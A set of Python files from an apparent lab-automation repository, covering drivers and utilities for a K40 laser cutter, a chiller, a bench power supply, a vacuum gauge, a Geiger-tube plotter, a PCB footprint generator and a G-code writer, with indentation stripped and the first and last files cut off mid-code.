msg = "Too Many Transmission Errors (%d Timeouts)" %(timeout_cnt)
update_gui(msg)
raise StandardError(msg)
if stop_calc[0]:
msg="Action Stopped by User."
update_gui(msg)
raise StandardError(msg)
def send_packet(self,line):
print 'sending packet'
self.dev.write(self.write_addr,line,self.timeout)
print 'sent'
def rapid_move(self,dxmils,dymils):
data=[]
egv_inst = egv(target=lambda s:data.append(s))
egv_inst.make_move_data(dxmils,dymils)
self.send_data(data)
def initialize_device(self,verbose=False):
try:
self.release_usb()
except:
pass
raise
# find the device
self.dev = usb.core.find(idVendor=0x1a86, idProduct=0x5512)
if self.dev is None:
raise StandardError("Laser USB Device not found.")
#return "Laser USB Device not found."
# set the active configuration. With no arguments, the first
# configuration will be the active one
try:
self.dev.set_configuration()
except:
raise
#return "Unable to set USB Device configuration."
raise StandardError("Unable to set USB Device configuration.")
# get an endpoint instance
cfg = self.dev.get_active_configuration()
intf = cfg[(0,0)]
ep = usb.util.find_descriptor(
intf,
# match the first OUT endpoint
custom_match = \
lambda e: \
usb.util.endpoint_direction(e.bEndpointAddress) == \
usb.util.ENDPOINT_OUT)
if ep == None:
raise StandardError("Unable to match the USB 'OUT' endpoint.")
# ?
self.dev.ctrl_transfer( 0x40, 177, 0x0102, 0, 0, 2000)
#PKT_STATUS_sync()
def hex2dec(self,hex_in):
#format of "hex_in" is ["40","e7"]
dec_out=[]
for a in hex_in:
dec_out.append(int(a,16))
return dec_out
if __name__ == "__main__":
k40=K40_CLASS()
run_laser = False
k40.initialize_device(verbose=False)
#k40.initialize_device()
print (k40.get_status())
#print k40.reset_position()
#print k40.unlock_rail()
print ("DONE")
# origin at lower left
# this also seems to crash it...
# also its not running the init sequence
# hmm
def move(self,dxmils,dymils, laser_on):
data=[]
print 'Making egv'
egv_inst = egv(target=lambda s:data.append(s))
print 'Making data'
egv_inst.make_move_data(dxmils,dymils, laser_on=laser_on)
print 'Sending data'
self.send_data(data)
print 'Data sent'
#ON = 68 #ord("D")=68
#OFF = 85 #ord("U")=85
if 1:
for _i in xrange(3):
move(k40, 200,200, True)
move(k40, -200,-200, True)
move(k40, 200,200, False)
move(k40, -200,-200, False)
'''
Each loop taking about 135-138 ms, even with the print
Often it will stall on the very first move
Manual has EMI note
Possibly they
Additionally, a ^C causes some weird issues and doesn't actually exit
Review their exception handling logic
'''
if 0:
iters = 0
while True:
iters += 1
for coords in [(200, 200), (-200, -200), (-200, 200), (200, -200)]:
dx, dy = coords
print
print
print
print iters
tstart = time.time()
#move(k40, dx, dy, False)
response = k40.get_status()
print 'response', response
continue
dt = time.time() - tstart
print 'dt: %3.3f' % dt
if dt > 0.140:
raise Exception("RT failure")
move(k40, 1, 1, False)
move(k40, -1,-1, False)
```
#### File: uvscada/nuc/gmchar_plt_pmt.py
```python
import argparse
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import json
def load_csv(f):
f = open(f, 'r')
data = []
print 'Loading'
for l in f:
try:
j = json.loads(l)
except:
break
data.append(j['v'])
return data
def load_jl(f):
f = open(f, 'r')
# skip metadata
f.readline()
data = []
print 'Loading'
for l in f:
try:
j = json.loads(l)
except:
break
data.append((j['v'], -j['iavg'] * 1e6))
if 1:
data2 = []
for i, d in enumerate(data):
v, i = d
if v >= 220:
data2.append(d)
data = data2
# normalize
if 1:
imin = min([x[1] for x in data])
if imin < 0:
for i, (v, iavg) in enumerate(data):
data[i] = (v, iavg - imin)
data = data[1:]
return data
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Help')
parser.add_argument('fn', help='File')
args = parser.parse_args()
print 'Looping'
fn = args.fn
print
print fn
fn_out = fn.replace('.jl', '.png')
if fn_out == fn:
raise Exception()
data = load_jl(fn)
# x mv y V
print 'Plotting (%d samples)' % (len(data),)
plt.semilogy(*zip(*data))
#fig = plt.gcf()
#fig.set_ylim(1e-2, 1e2)
ax = plt.gca()
ax.set_ylim(1e-2, 1e2)
plt.xlabel('Tube voltage')
plt.ylabel('Tube uA')
plt.savefig(fn_out)
#plt.show()
# average current 500 - 700 v
meas = []
for i, d in enumerate(data):
v, i = d
if v >= 500 and v <= 700:
meas.append(i)
print 'Center average: %0.3f' % (sum(meas) / len(meas),)
```
#### File: uvscada/pcb/points.py
```python
import math
def simple():
'''
3.14 * 0.5 = 1.57
1.57 / 40 = 0.03925
take half => 0.019625
20 mil diameter pads
rond
6 mil fab rule?
20 mil hole, 10 mil ring each side
should be fine
eh pretty tight
lets shrink slightly
'''
D = 0.5
R = D / 2
PINS = 40
for i in xrange(PINS):
pin = i + 1
angle = (i + 0.5) * 2 * math.pi / PINS
if angle > 2 * math.pi:
angle -= 2 * math.pi
angle = -angle
x = R * math.sin(angle)
y = R * math.cos(angle)
print '% 3d: % 4d x % 4d y % 5d r' % (pin, 1000 * x, 1000 * y, -360 * angle / 3.14 / 2 )
'''
autogen
pcad.lia simple
.dxf may also work
figured out how to import .lia
do that
OSH rules
https://oshpark.com/guidelines
6 mil minimum trace width
6 mil minimum spacing
at least 15 mil clearances from traces to the edge of the board
13 mil minimum drill size
7 mil minimum annular ring
pcbway rules
http://www.pcbway.com/capabilities.html
drill size
Min drill size is 0.2mm,
7.9 mil
max drill is 6.3mm.
Any holes greater than 6.3mm or smaller than 0.3mm will be subject to extra charges.
6.3: 248 mil
0.3: 11.8 mil
Min Width of Annular Ring
0.15mm(6mil)
Minimum Diameter of Plated Half Holes
0.6mm
eeeeh
that messes up what I'm trying to do
23.6 mil
actually maybe its okay
so in summary
current
hole: 13
annular ring: 7
net size: 27
move to
hole: 12
annular ring: 6
net size: 24
eliminated most but not all
need 1 more mil
hole 12
0.5 * 3.14159 = 1.570795
1.570795 / 28 = 0.056099821
56 mil
6 mil spacing min
7 mil minimum annular ring
0.1" fencepost ref
40
68
9 mil ring
say 9 mil spacing
9 mil ring
56 - 9 - 2 * 9 = 29 hole
wait no hole
just do it evenly
56/2 = 28
'''
def header():
return '''\
ACCEL_ASCII "POINTS.LIA"
(asciiHeader
(asciiVersion 3 0)
(timeStamp 2017 1 7 0 54 1)
(program "points.py" "1.0.0")
(copyright "points.py")
(headerString "")
(fileUnits Mil)
(guidString "{00000000-0000-0000-0000-000000000000}")
)
(library "Library_1"
(padStyleDef "(Default)"
(holeDiam 30mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Oval) (shapeWidth 60mil) (shapeHeight 60mil) )
(padShape (layerNumRef 2) (padShapeType Oval) (shapeWidth 60mil) (shapeHeight 60mil) )
(padShape (layerType Signal) (padShapeType Oval) (shapeWidth 60mil) (shapeHeight 60mil) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(padStyleDef "EF20X60TOP1"
(holeDiam 0mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Oval) (shapeWidth 20mil) (shapeHeight 60mil) )
(padShape (layerNumRef 2) (padShapeType Ellipse) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType Signal) (padShapeType Oval) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(padStyleDef "P:EX30Y30D201"
(holeDiam 12mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Oval) (shapeWidth 24mil) (shapeHeight 24mil) )
(padShape (layerNumRef 2) (padShapeType Oval) (shapeWidth 24mil) (shapeHeight 24mil) )
(padShape (layerType Signal) (padShapeType Oval) (shapeWidth 24mil) (shapeHeight 24mil) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(padStyleDef "RECT28"
(holeDiam 0mil)
(startRange 1)
(endRange 2)
(padShape (layerNumRef 1) (padShapeType Rect) (shapeWidth 28mil) (shapeHeight 28mil) )
(padShape (layerNumRef 2) (padShapeType Ellipse) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType Signal) (padShapeType Rect) (shapeWidth 28mil) (shapeHeight 28mil) )
(padShape (layerType Plane) (padShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(padShape (layerType NonSignal) (padShapeType Oval) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(viaStyleDef "(Default)"
(holeDiam 28mil)
(startRange 1)
(endRange 2)
(viaShape (layerNumRef 1) (viaShapeType Ellipse) (shapeWidth 50mil) (shapeHeight 50mil) )
(viaShape (layerNumRef 2) (viaShapeType Ellipse) (shapeWidth 50mil) (shapeHeight 50mil) )
(viaShape (layerType Signal) (viaShapeType Ellipse) (shapeWidth 50mil) (shapeHeight 50mil) )
(viaShape (layerType Plane) (viaShapeType NoConnect) (shapeWidth 0.0) (shapeHeight 0.0) )
(viaShape (layerType NonSignal) (viaShapeType Ellipse) (shapeWidth 0mil) (shapeHeight 0mil) )
)
(textStyleDef "(Default)"
(font
(fontType Stroke)
(fontFamily Modern)
(fontFace "Quality")
(fontHeight 80mil)
(strokeWidth 10mil)
)
(textStyleAllowTType False)
(textStyleDisplayTType False)
)
(textStyleDef "(DefaultTTF)"
(font
(fontType Stroke)
(fontFamily SanSerif)
(fontFace "QUALITY")
(fontHeight 100.0)
(strokeWidth 10.0)
)
(font
(fontType TrueType)
(fontFamily Modern)
(fontFace "Arial")
(fontHeight 125.0)
(strokeWidth 0.19843 mm)
(fontWeight 400)
(fontCharSet 0)
(fontOutPrecision 7)
(fontClipPrecision 32)
(fontQuality 1)
(fontPitchAndFamily 6)
)
(textStyleAllowTType True)
(textStyleDisplayTType True)
)
(patternDefExtended "ROUND40-0.5_1"
(originalName "ROUND40-0.5")
(patternGraphicsNameRef "Primary")
(patternGraphicsDef
(patternGraphicsNameDef "Primary")
(multiLayer
'''
def footer(pins):
s = '''\
)
(layerContents (layerNumRef 10)
(arc (pt 0mil 0mil) (radius 250mil) (startAngle 0.0) (sweepAngle 360.0) (width 10mil) )
)
(layerContents (layerNumRef 6)
(attr "RefDes" "" (pt -266.767mil 294.091mil) (isVisible True) (textStyleRef "(Default)") )
(attr "Type" "" (pt -266.767mil -389mil) (isVisible True) (textStyleRef "(Default)") )
)
)
)
(compDef "ROUND40-0.5_1"
(originalName "ROUND40-0.5")
(compHeader
(sourceLibrary "")
(numPins 40)
(numParts 1)
(alts (ieeeAlt False) (deMorganAlt False))
(refDesPrefix "")
)
'''
for i in xrange(pins):
'''
(compPin "1" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
(compPin "2" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
(compPin "3" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
...
(compPin "40" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )
'''
pin = i + 1
s += ' (compPin "%d" (partNum 1) (symPinNum 1) (gateEq 0) (pinEq 0) )\n' % (pin,)
s += '''\
(attachedPattern (patternNum 1) (patternName "ROUND40-0.5")
(numPads 40)
(padPinMap
'''
for i in xrange(pins):
'''
(padNum 1) (compPinRef "1")
(padNum 2) (compPinRef "2")
(padNum 3) (compPinRef "3")
...
(padNum 40) (compPinRef "40")
'''
pin = i + 1
s += ' (padNum %d) (compPinRef "%d")\n' % (pin, pin)
s += '''\
)
)
)
)
'''
return s
def auto(PINS=40, D=0.5, padStyleRef="EF20X60TOP1"):
R = D / 2
s = header()
for i in xrange(PINS):
pin = i + 1
angler = (i + 0.5) * 2 * math.pi / PINS
angler = -angler
angled = angler * 180 / math.pi
x = R * math.sin(angler)
y = R * math.cos(angler)
'''
(pad (padNum 1) (padStyleRef "EF20X60TOP1") (pt -19mil 249mil) (rotation 4.0)(defaultPinDes "1"))
(pad (padNum 2) (padStyleRef "EF20X60TOP1") (pt -58mil 243mil) (rotation 13.0)(defaultPinDes "2"))
(pad (padNum 3) (padStyleRef "EF20X60TOP1") (pt -95mil 230mil) (rotation 22.0)(defaultPinDes "3"))
'''
# Rotation CW
# Need to counter above rotation
l = ' (pad (padNum %d) (padStyleRef "%s") (pt %dmil %dmil) (rotation %0.1f)(defaultPinDes "%d"))\n' % (pin, padStyleRef, 1000 * x, 1000 * y, -angled, pin)
s += l
s += footer(PINS)
print s
# Original design
# Elongated oval pad sliced in the middle
#auto(PINS=40, D=0.5, padStyleRef="EF20X60TOP1")
# castillation
#auto(PINS=40, D=0.5, padStyleRef="P:EX30Y30D201")
# diameter
# pad size/2
# solder mask expansion
# edge clearance
#auto(PINS=28, D=0.5+0.056/2+2*0.004+2*0.006, padStyleRef="RECT28")
auto(PINS=28, D=0.45+0.056/2+2*0.004+2*0.006, padStyleRef="RECT28")
```
#### File: uvscada/thermotek/t251p.py
```python
import serial
import binascii
import datetime
import time
'''
comm error status - Single ASCII byte that indicates any error in the last command received.
The errors are as follows:
No Error
-
30h (0)
Checksum Error
-
31h
(1)
Bad Command
-
32h (2)
Out of Bound Qualifier
33h (3)
'''
err_i2s = {
'0': 'NONE', # No Error
'1': 'CHECKSUM', # Checksum Error
'2': 'BAD_CMD', # Bad Command
'3': 'OOB', # Out of Bound Qualifier
}
XON = '\x11'
XOFF = '\x13'
SOC = '.'
CR = '\x0D'
class BadPacket(Exception):
pass
def calc_checksum(buff):
'''Calculate checksum, returned in expected ASCII format'''
return '%02X' % (sum(bytearray(buff)) & 0xFF)
def cmd_encode(cmd_code, opts='', soc='\x2E', checksum=None, cr='\x0D'):
'''
2.1 Command Format
The command issued by the PC will be in the following format:
soc
command code
n optional qualifiers checksum
Where
soc -
cr
'''
cmd_code = str(cmd_code)
assert len(cmd_code) == 1
tocheck = soc + cmd_code + opts
if checksum is None:
# ASCI protcool, so checksum is sent as ASCII
checksum = calc_checksum(tocheck)
return tocheck + checksum + cr
def response_decode(buff):
'''
2.2
Response Format
Every command requires a response of some sort. The general form of the response is:
sor
command
echo
Where
sor -
command echo -
comm error
status
n response
checksum
cr
Start of Response. The command starts with a 23h representing an ASCII
#. It is one byte in length.
Echo the last received valid command.
comm error status - Single ASCII byte that indicates any error in the last command received.
The errors are as follows:
No Error
-
30h (0)
Checksum Error
-
31h
(1)
Bad Command
-
32h (2)
Out of Bound Qualifier
33h (3)
n response -
checksum -
cr -
2.3
data, alarms messages, status conditions as requested by the command
two ASCII hexadecimal bytes representing the least significant 8 bits of the
sum of all preceding bytes of the command starting with the sor.
ASCII carriage return 0Dh
'''
if buff is None:
raise ValueError("packet buff is None")
sor = buff[0]
if sor != '\x23':
raise BadPacket("Bad sor")
cr = buff[-1]
if cr != '\x0D':
raise BadPacket("Bad cr")
checksum_got = buff[-2]
checksum_calc = calc_checksum(buff[0:-2])
if checksum_got != checksum_calc:
raise BadPacket("Bad checksum")
last_cmd = buff[1]
err = err_i2s[int(buff[2])]
response = buff[3:len(buff) - 2]
return last_cmd, err, response
class T251P(object):
def __init__(self, port="/dev/ttyUSB0", ser_timeout=0.10, ser=None):
self.verbose = True
if not ser:
ser = serial.Serial(port,
baudrate=9600,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
rtscts=False,
dsrdtr=False,
# sucks..doesn't packetize reads
#xonxoff=True,
xonxoff=False,
timeout=ser_timeout,
# Blocking writes
writeTimeout=None)
self.ser = ser
#self.ser.flushInput()
#self.ser.flushOutput()
#self.flush()
self.rxbuff = ''
self.xon = False
def flush(self):
timeout = self.ser.timeout
try:
self.ser.timeout = 0.1
while True:
l = self.ser.readline()
# finished command in progress => flushed
if not l:
return
# a finished command => done
if l[-1] == '\n':
return
finally:
self.ser.timeout = timeout
def snd(self, cmd_code, opts):
encoded = cmd_encode(cmd_code, opts)
out = XON + encoded + XOFF
if self.verbose:
print('TX: %s' % binascii.hexlify(out))
print("TX ASCII: %s" % encoded[0:-1])
self.ser.write(out)
self.ser.flush()
def recv(self):
'''
WD packets are XON without XOFF
Normal packets are XON + data + XOFF
'''
self.rxbuff += self.ser.read(16)
print('Got %u: %s' % (len(self.rxbuff), binascii.hexlify(self.rxbuff)))
while True:
xon_pos = self.rxbuff.find(XON)
xoff_pos = self.rxbuff.find(XOFF)
#print(xon_pos, xoff_pos, len(self.rxbuff))
if xon_pos < 0 and xoff_pos < 0:
return None
# Process new xon if its not going to interrupt a valid packet
if xon_pos >= 0 and (xoff_pos < 0 or xon_pos < xoff_pos):
self.rxbuff = self.rxbuff[xon_pos + 1:]
self.xon = True
if self.verbose:
print('rx XON')
continue
if xoff_pos >= 0:
packet = self.rxbuff[0:xoff_pos + 1]
self.rxbuff = self.rxbuff[xoff_pos + 1:]
if not self.xon:
if self.verbose:
print('WARNING: packet missing XON')
continue
else:
assert packet[-1] == XOFF
return response_decode(packet)
def cmd(self, cmd_code, opts='', timeout=1.5):
# watchdog requests may have stacked up
#self.ser.flushInput()
self.snd(cmd_code, opts)
tstart = time.time()
while True:
if time.time() - tstart > timeout:
raise Exception("Timed out waiting for valid reply")
try:
recv = self.recv()
except BadPacket as e:
if self.verbose:
print('WARNING: bad packet %s' % e)
continue
# watchdog
if not recv:
continue
last_cmd, err, response = recv
# ??? shouldn't get this due to flush and such, but just in case
if last_cmd != cmd_code:
if self.verbose:
print('WARNING: unexpected command result %s' % last_cmd)
continue
if err != 'NONE':
raise Exception("Got error: %s" % err)
return response
def mode_select(self, mode):
modei = {
'STAND_BY': 0,
'RUN': 1,
}[mode]
self.cmd('G', str(modei))
def read_memory(self, opt=0):
# 0. Temp & Max Power Setpoint
# TODO: decode
return self.cmd('H', str(opt))
def read_alarm_state(self):
'''
fs : Float Switch
ha : Hi Alarm
la : Low Alarm
sa : Sensor Alarm
pa : EEPROM Fail
wa : Watch dog
'''
fs, ha, la, sa, pa, wa = self.cmd('H')
return fs, ha, la, sa, pa, wa
def serial_watchdog(self):
''''
NOTE: this command is special, used to init comms
md: mode status
as: alarm status
cs: chiller status
ds: dryer status
'''
md, as_, cs, ds = self.cmd('U')
return md, as_, cs, ds
def monitor_wd(t):
while True:
try:
recv = t.recv()
except BadPacket as e:
print('WARNING: bad packet %s' % e)
continue
print('%s: recv packet: %s' % (datetime.datetime.utcnow().isoformat(), recv))
def run():
t = T251P()
if 0:
while True:
d = t.ser.read()
print(len(d), binascii.hexlify(d))
# verify XON pulse
if 0:
d = t.ser.read()
assert len(d) == 0
t.serial_watchdog()
#t.ser.write('\x2e\x47\x30\x41\x35\x0D')
#monitor_wd(t)
#t.mode_select('RUN')
t.mode_select('STAND_BY')
#print('read_alarm_state', t.read_alarm_state())
def test():
assert cmd_encode('\x47', '\x30') == '\x2e\x47\x30\x41\x35\x0D'
print('Test ok')
run()
#test()
```
#### File: uvscada/uvscada/e36.py
```python
import time
import sys
import datetime
import serial
class Timeout(Exception):
pass
def now():
return datetime.datetime.utcnow().isoformat()
def dbg(s):
if 0:
print 'GPIO %s: %s' % (now(), s)
'''
*********************************
Serial
*********************************
Just send commands verbatim
'''
class PUSerial:
def __init__(self, port="/dev/ttyUSB0", baudrate=9600, timeout=0, verbose=False):
self.port = port
self.verbose = verbose
self.ser = serial.Serial(port,
baudrate=baudrate,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
rtscts=False,
dsrdtr=False,
xonxoff=False,
timeout=3,
writeTimeout=0)
self.ser.flushInput()
self.ser.flushOutput()
def interface(self):
return "RS232"
def send_str(self, s):
if self.verbose:
print 'DBG: sending "%s"' % (s)
s += "\n"
self.ser.write(s)
self.ser.flush()
def recv_str(self):
s = self.ser.readline()
s = s.rstrip()
if self.verbose:
print 'DBG: received "%s"' % (s)
return s
def sendrecv_str(self, s):
if self.verbose:
print 'DBG: sending "%s"' % (s)
# send without sleep
self.ser.write(s + '\n')
self.ser.flush()
# wait for response line
s = self.ser.readline()
s = s.rstrip()
if self.verbose:
print 'DBG: received "%s"' % (s)
return s
def version(self):
return 'N/A'
'''
outp: 1 or 2
Device tracks which is currently enabled
By default commands act on the last selected output
Option argument to per-output commands can switch output if not already selected
'''
class E36:
def __init__(self, io, verbose=False):
self.verbose = verbose
self.vendor = None
self.model = None
# Active rail for commands, unknown at init
self.outp = None
self.io = io
# Make sure simple queries work
if not self.version():
raise Exception("Failed init %s" % (io.interface()))
'''
*********************************8
MISC
*********************************8
'''
def version(self):
return self.io.sendrecv_str("SYSTEM:VERSION?")
def ident(self):
# just vendor, model
return self.ident_ex()[0:2]
def ident_ex(self):
'''
PS ident: ['HEWLETT-PACKARD', 'E3632A', '0', '1.1-5.0-1.0']
'''
ret = self.io.sendrecv_str("*IDN?").split(',')
self.vendor = ret[0]
self.model = ret[1]
sn = ret[2]
fw = ret[3]
return (self.vendor, self.model, sn, fw)
def remote(self):
'''Put into remote mode? Required before running any commands'''
self.io.send_str("SYSTEM:REMOTE")
def local(self):
'''Put into local mode? Evidently displays better'''
#self.io.send_str("SYSTEM:LOCAL") # to make display updates in real time
# for some reason you need to issue the GPIB instead of the device local command
self.io.local()
def off(self, tsleep=0.2):
'''Turn off both outputs'''
self.io.send_str("OUTPUT OFF")
# Copied from on. Needed?
time.sleep(tsleep)
def on(self, tsleep=0.2):
'''Turn on both outputs'''
self.io.send_str("OUTPUT ON")
# 0.1 causes error, 0.15 fine
time.sleep(tsleep)
# .15 worked + some margin
def set_outp(self, outp, tsleep=0.25):
'''Force selecting given rail'''
if not outp in (1, 2):
raise Exception('Bad outp %s' % (outp,))
# FIXME: hack
if self.model == 'E3632A':
return
self.io.send_str("INSTRUMENT:SELECT OUTP%d" % outp)
self.outp = outp
time.sleep(tsleep)
def disp_vi(self, outp=None):
'''display actual currents on front panel'''
# FIXME: hack
if self.model == 'E3632A':
return
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("DISP:MODE VI")
def wait_ready(self):
'''
Generally, it is best to use the "Operation Complete" bit (bit
0) in the Standard Event register to signal when a command
sequence is completed. This bit is set in the register after an
*OPC command has been executed. If you send *OPC after a
command which loads a message in the power supply's
output buffer (query data), you can use the "Operation
Complete" bit to determine when the message is available.
However, if too many messages are generated before the
*OPC command executes (sequentially), the output buffer
will overload and the power supply will stop processing
commands.
'''
while True:
print "sending *OPC?"
self.io.send_str("*OPC?\012")
self.ser.flush()
rx = self.ser.readline(100).rstrip()
print "got ",rx
if(rx == "1"):
break
def apply(self, voltage, current, outp=None):
'''Set both voltage and current at once?'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("APPL %s,%s" % (voltage, current))
'''
Errors are retrieved in the first- in- first- out (FIFO) order.
The first error returned is the first error that was stored.
Errors are cleared as you read them. When you have read all
errors from the queue, the ERROR annunciator turns off and
the errors are cleared. The power supply beeps once each
time an error is generated.
If more than 20 errors have occurred, the last error stored
in the queue (the most recent error) is replaced with
- 350, "Queue overflow". No additional errors are stored until
you remove errors from the queue. If no errors have
occurred when you read the error queue, the power supply
responds with +0, "No error" over the remote interface or NO
ERRORS from the front panel.
The error queue is cleared by the *CLS (clear status)
command or when power is cycled. The errors are also
cleared when you read the queue.
The *RST (reset) command does not clear the error queue.
'''
def beep(self):
'''Call this to annoying your labmates'''
self.io.send_str("SYSTEM:BEEPER")
def text(self, s):
'''Call this to put creepy messages directly on the display'''
if len(s) > 11:
raise Exception('string too long')
self.io.send_str("DISPLAY:TEXT \"%s\"" % (s,))
def text_clr(self):
self.io.send_str("DISPlay:TEXT:CLEar")
def rst(self, tsleep=1.0):
'''Reset the device except for errors'''
self.io.send_str("*RST")
# Device locks up for a bit
time.sleep(tsleep)
def clr(self):
'''Clear error queue'''
self.io.send_str("*CLS")
def get_err(self):
'''Get next error from queue'''
return self.io.sendrecv_str("SYST:ERR?")
'''
*********************************8
CURRENT
*********************************8
'''
def curr(self, outp=None):
'''Get current reading'''
return float(self.io.sendrecv_str("MEAS:CURR?"))
def curr_max(self, outp=None):
'''Get current setpoint as set by set_curr'''
return float(self.io.sendrecv_str("CURR?"))
def set_curr(self, current, outp=None):
'''Set current limit on given output'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("CURR %3.3f" % current)
'''
*********************************8
VOLTAGE
*********************************8
'''
# 0.185 s over serial
def volt(self, outp=None):
'''Get voltage reading'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
return float(self.io.sendrecv_str("MEAS:VOLT?"))
def volt_max(self, outp=None):
'''Get voltage setpoint'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
return float(self.io.sendrecv_str("VOLT?"))
def set_volt(self, volt, outp=None):
'''Set voltage limit on given output'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLT %3.3f" % (volt,))
def set_ovp(self, volt, outp=None):
'''Set over voltage protection limit on given output'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT %3.3f" % (volt,))
def ovp_enb(self, outp=None):
'''Enable over voltage protection'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT:STATE ON")
def ovp_dis(self, outp=None):
'''Disable over voltage protection'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT:STATE OFF")
def ovp_clr(self, outp=None):
'''Clear voltage protect fault?'''
if outp is not None and outp != self.outp:
self.set_outp(outp)
self.io.send_str("VOLTAGE:PROT:CLEAR")
def print_errors(ps):
print 'Errors:'
errors = []
while True:
s = ps.get_err()
if s == '+0,"No error"':
break
errors.append(s)
if errors:
for error in errors:
print ' %s' % error
else:
print ' None'
```
#### File: uvscada/uvscada/gp307.py
```python
import serial
# like on the display
def fmt(f):
return '%1.1E' % f
class GP307(object):
def __init__(self, port="/dev/ttyUSB0", ser_timeout=10.0, ser=None):
self.verbose = 0
if not ser:
ser = serial.Serial(port,
baudrate=9600,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
rtscts=False,
dsrdtr=False,
xonxoff=False,
timeout=ser_timeout,
# Blocking writes
writeTimeout=None)
self.ser = ser
self.ser.flushInput()
self.ser.flushOutput()
self.mode = None
self.flush()
def flush(self):
'''
measurements every 5 seconds
9600 baud
1200 bytes / sec => 0.83 * 9/8 = 0.93 ms/char
27 char message
min transmit time: 27 * 0.93 = 25 ms
should ideally flush for that in case we start in the middle of a message
probably not that efficient..wait at least double
'''
timeout = self.ser.timeout
try:
self.ser.timeout = 0.1
while True:
l = self.ser.readline()
# finished command in progress => flushed
if not l:
return
# a finished command => done
if l[-1] == '\n':
return
finally:
self.ser.timeout = timeout
def get(self):
'''Return ion gauge, TC A, TC B. Up to 5 seconds on healthy system'''
# 9.90E+09,6.10E-02,9.90E+09
l = self.ser.readline().strip()
#print l
ig, a, b = l.split(',')
return float(ig), float(a), float(b)
```
#### File: uvscada/uvscada/ngc.py
```python
import sys
from os import path
cnc = None
class CNC(object):
def __init__(self, em=-1, rpm=None, fr=2.0, fr_z=1.0, verbose=False):
# was default 1./8
# for drilling?
if em is not None and em <= 0:
raise ValueError("Invalid endmill diameter")
# Endmill diameter
self.em = em
# Z rising to clear part ("chaining")
# Slow withdrawl in material
self.clear_zps = 0.050
# After material clear
self.clear_zp = 0.100
# Depth to go all the way through the part
self.clear_zn_u = -0.020
# Distance between finishing pass contours
self.finish_u = 0.005
# Main feedrate (xy)
self.fr = fr
# Plunge feedrate
self.fr_z = fr_z
self.rpm = rpm
self.verbose = verbose
# Name output .ngc same as the generating python file
# Could support multiple files by adding an open function if needed
m_fn = path.abspath(sys.modules['__main__'].__file__)
ngc_fn = m_fn.replace('.py', '.ngc')
if ngc_fn.find('.ngc') < 0:
raise Exception("Failed to replace extension")
# Output file
self.f = open(ngc_fn, 'w')
self.chain = clear_z
def init(*args, **kwargs):
global cnc
cnc = CNC(*args, **kwargs)
start()
return cnc
def line(s='', verbose=None):
if verbose is None:
verbose = cnc.verbose
cnc.f.write(s + '\n')
if verbose:
print s
def comment(s):
if s.find('(') >= 0:
raise ValueError("Nested comment")
line('(%s)' % s)
def comment_block(s):
comment('*' * 80)
comment(s)
comment('*' * 80)
def start():
if cnc.em is None:
comment('Endmill: none. Drill only')
else:
comment('Endmill: %0.4f' % cnc.em)
line('G90')
clear_zq()
rpm(cnc.rpm)
def rpm(val):
line('M3 S%0.1f' % val)
def end():
line()
# Make sure don't crash
clear_zq()
line('G0 X0 Y0')
line('M30')
def fmt(f):
return '%+0.3f' % f
def clear_z():
line('G1 Z%0.3f F%0.3f' % (cnc.clear_zps, cnc.fr_z))
line('G0 Z%0.3f' % cnc.clear_zp)
def clear_zq():
line('G0 Z%0.3f' % cnc.clear_zp)
def clear_zn():
line('G0 Z%0.3f' % cnc.clear_zps)
line('G1 Z%0.3f F%0.3f' % (cnc.clear_zn_u, cnc.fr_z))
# Exact clearance
def clear_ep(pos):
line('(ClearE+ %0.3f)' % pos)
return '%0.3f' % (pos + cnc.em/2)
def clear_en(pos):
line('(ClearE- %0.3f)' % pos)
return '%0.3f' % (pos - cnc.em/2)
# Delta clearance
def clear_dp(pos):
line('(Clear+ %0.3f)' % pos)
return '%0.3f' % (pos + cnc.em/2 + 0.25)
def clear_dn(pos):
line('(Clear- %0.3f)' % pos)
return '%0.3f' % (pos - cnc.em/2 - 0.25)
def g0(x=None, y=None, z=None):
xstr = ''
ystr = ''
zstr = ''
if x is not None:
xstr = ' X%s' % fmt(x)
if y is not None:
ystr = ' Y%s' % fmt(y)
if z is not None:
zstr = ' Z%s' % fmt(z)
